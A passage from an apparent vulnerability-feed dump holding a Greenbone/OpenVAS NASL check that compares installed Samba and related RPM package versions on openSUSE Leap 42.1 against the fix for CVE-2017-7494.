following\n issue: - An unprivileged user with access to the samba server could cause smbd\n to load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. [CVE-2017-7494, bso#12780,\n bsc#1038231] This update was imported from SUSE:SLE-12-SP1:Update project. NOTE:\n This update is released in openSUSE Leap 42.1 after its official End Of Life\n only because of its severity and potential impact for users that have not\n migrated yet. 
Please upgrade your openSUSE Leap 42.1 as soon as possible.\");\n\n script_tag(name:\"affected\", value:\"samba on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1415-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"ctdb\", rpm:\"ctdb~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ctdb-debuginfo\", rpm:\"ctdb-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ctdb-devel\", rpm:\"ctdb-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ctdb-tests\", rpm:\"ctdb-tests~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ctdb-tests-debuginfo\", rpm:\"ctdb-tests-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc-devel\", rpm:\"libdcerpc-atsvc-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc0\", rpm:\"libdcerpc-atsvc0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc0-debuginfo\", rpm:\"libdcerpc-atsvc0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-binding0\", rpm:\"libdcerpc-binding0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo\", rpm:\"libdcerpc-binding0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-devel\", rpm:\"libdcerpc-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr-devel\", rpm:\"libdcerpc-samr-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr0\", rpm:\"libdcerpc-samr0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr0-debuginfo\", rpm:\"libdcerpc-samr0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc0\", rpm:\"libdcerpc0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc0-debuginfo\", rpm:\"libdcerpc0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec-devel\", rpm:\"libgensec-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec0\", rpm:\"libgensec0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec0-debuginfo\", rpm:\"libgensec0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-devel\", rpm:\"libndr-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac-devel\", rpm:\"libndr-krb5pac-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac0\", 
rpm:\"libndr-krb5pac0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo\", rpm:\"libndr-krb5pac0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt-devel\", rpm:\"libndr-nbt-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt0\", rpm:\"libndr-nbt0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo\", rpm:\"libndr-nbt0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard-devel\", rpm:\"libndr-standard-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard0\", rpm:\"libndr-standard0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard0-debuginfo\", rpm:\"libndr-standard0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr0\", rpm:\"libndr0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr0-debuginfo\", rpm:\"libndr0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry-devel\", rpm:\"libregistry-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry0\", rpm:\"libregistry0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry0-debuginfo\", rpm:\"libregistry0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials-devel\", rpm:\"libsamba-credentials-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials0\", rpm:\"libsamba-credentials0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo\", rpm:\"libsamba-credentials0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-hostconfig-devel\", rpm:\"libsamba-hostconfig-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-hostconfig0\", rpm:\"libsamba-hostconfig0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo\", rpm:\"libsamba-hostconfig0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb-devel\", rpm:\"libsamba-passdb-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb0\", rpm:\"libsamba-passdb0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb0-debuginfo\", rpm:\"libsamba-passdb0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy-devel\", rpm:\"libsamba-policy-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy0\", rpm:\"libsamba-policy0~4.2.4~33.1\", 
rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy0-debuginfo\", rpm:\"libsamba-policy0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util-devel\", rpm:\"libsamba-util-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util0\", rpm:\"libsamba-util0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util0-debuginfo\", rpm:\"libsamba-util0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb-devel\", rpm:\"libsamdb-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb0\", rpm:\"libsamdb0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb0-debuginfo\", rpm:\"libsamdb0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw-devel\", rpm:\"libsmbclient-raw-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw0\", rpm:\"libsmbclient-raw0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo\", rpm:\"libsmbclient-raw0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report 
+= res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf-devel\", rpm:\"libsmbconf-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf0\", rpm:\"libsmbconf0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf0-debuginfo\", rpm:\"libsmbconf0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap-devel\", rpm:\"libsmbldap-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap0\", rpm:\"libsmbldap0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap0-debuginfo\", rpm:\"libsmbldap0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util-devel\", rpm:\"libtevent-util-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util0\", rpm:\"libtevent-util0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util0-debuginfo\", rpm:\"libtevent-util0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.2.4~33.1\", 
rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-core-devel\", rpm:\"samba-core-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-libs-debuginfo\", rpm:\"samba-libs-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-pidl\", rpm:\"samba-pidl~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-python\", rpm:\"samba-python~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-python-debuginfo\", rpm:\"samba-python-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-test\", rpm:\"samba-test~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-test-debuginfo\", rpm:\"samba-test-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-test-devel\", rpm:\"samba-test-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", 
rpm:\"samba-winbind-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc0-32bit\", rpm:\"libdcerpc-atsvc0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc0-debuginfo-32bit\", rpm:\"libdcerpc-atsvc0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-binding0-32bit\", rpm:\"libdcerpc-binding0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo-32bit\", rpm:\"libdcerpc-binding0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr0-32bit\", rpm:\"libdcerpc-samr0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr0-debuginfo-32bit\", rpm:\"libdcerpc-samr0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc0-32bit\", rpm:\"libdcerpc0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc0-debuginfo-32bit\", rpm:\"libdcerpc0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec0-32bit\", rpm:\"libgensec0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec0-debuginfo-32bit\", rpm:\"libgensec0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac0-32bit\", rpm:\"libndr-krb5pac0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo-32bit\", rpm:\"libndr-krb5pac0-debuginfo-32bit~4.2.4~33.1\", 
rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt0-32bit\", rpm:\"libndr-nbt0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo-32bit\", rpm:\"libndr-nbt0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard0-32bit\", rpm:\"libndr-standard0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard0-debuginfo-32bit\", rpm:\"libndr-standard0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr0-32bit\", rpm:\"libndr0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr0-debuginfo-32bit\", rpm:\"libndr0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0-32bit\", rpm:\"libnetapi0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0-debuginfo-32bit\", rpm:\"libnetapi0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry0-32bit\", rpm:\"libregistry0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry0-debuginfo-32bit\", rpm:\"libregistry0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials0-32bit\", rpm:\"libsamba-credentials0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo-32bit\", rpm:\"libsamba-credentials0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"libsamba-hostconfig0-32bit\", rpm:\"libsamba-hostconfig0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo-32bit\", rpm:\"libsamba-hostconfig0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb0-32bit\", rpm:\"libsamba-passdb0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb0-debuginfo-32bit\", rpm:\"libsamba-passdb0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy0-32bit\", rpm:\"libsamba-policy0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy0-debuginfo-32bit\", rpm:\"libsamba-policy0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util0-32bit\", rpm:\"libsamba-util0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util0-debuginfo-32bit\", rpm:\"libsamba-util0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb0-32bit\", rpm:\"libsamdb0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb0-debuginfo-32bit\", rpm:\"libsamdb0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw0-32bit\", rpm:\"libsmbclient-raw0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo-32bit\", rpm:\"libsmbclient-raw0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf0-32bit\", rpm:\"libsmbconf0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf0-debuginfo-32bit\", rpm:\"libsmbconf0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap0-32bit\", rpm:\"libsmbldap0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap0-debuginfo-32bit\", rpm:\"libsmbldap0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util0-32bit\", rpm:\"libtevent-util0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util0-debuginfo-32bit\", rpm:\"libtevent-util0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~4.2.4~33.1\", 
rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-libs-32bit\", rpm:\"samba-libs-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-libs-debuginfo-32bit\", rpm:\"samba-libs-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 